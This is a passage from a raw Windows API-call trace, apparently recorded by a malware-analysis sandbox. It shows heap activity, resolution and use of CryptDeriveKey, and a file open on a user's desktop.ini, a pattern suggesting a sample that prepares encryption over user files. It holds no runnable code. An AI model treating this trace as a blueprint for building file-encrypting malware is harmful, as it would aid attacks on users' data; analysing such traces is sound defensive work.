lpUsedDefaultChar=0x0) returned 15 [0251.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x34aa568, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0251.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0251.643] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0251.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0251.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0251.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0251.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0251.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0251.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0251.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0251.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0251.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0251.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0251.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.644] CryptDeriveKey (in: hProv=0xad2c70, Algid=0x6601, hBaseData=0xaa59a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58a0) returned 1 [0251.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0251.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0251.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0251.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0251.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0251.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0251.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0251.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0251.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0251.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0251.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0251.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0251.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0251.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0251.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0251.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0251.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0251.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0251.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0251.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0251.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0251.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0251.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0251.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0251.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0251.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0251.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0251.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0251.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0251.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0251.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0251.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0251.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0251.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0251.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0251.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0251.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0251.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0251.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0251.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0251.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0251.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0251.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0251.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0251.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0251.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0251.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0251.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0251.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0251.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0251.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0251.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0251.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0251.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0251.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0251.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0251.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0251.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0251.649] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0251.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0251.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0251.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0251.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0251.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0251.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0251.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0251.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0251.650] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0251.650] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0251.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0251.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0251.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0251.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0251.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0251.651] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0251.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0251.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0251.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0251.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0251.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0251.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0251.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0251.652] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0251.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0251.652] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0251.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0251.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0251.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0251.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0251.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0251.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0251.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0251.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.652] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.653] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0251.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0251.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0251.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0251.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0251.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0251.653] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.653] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0251.653] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0251.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0251.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0251.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0251.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0251.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0251.653] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0251.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0251.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0251.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0251.654] CryptDestroyHash (hHash=0xaa59a0) returned 1 [0251.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0251.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0251.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0251.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0251.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0251.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0251.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0251.654] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0251.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0251.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0251.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0251.654] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.654] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.654] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.655] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0251.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0251.655] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0251.655] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0251.655] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0251.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0251.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0251.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: 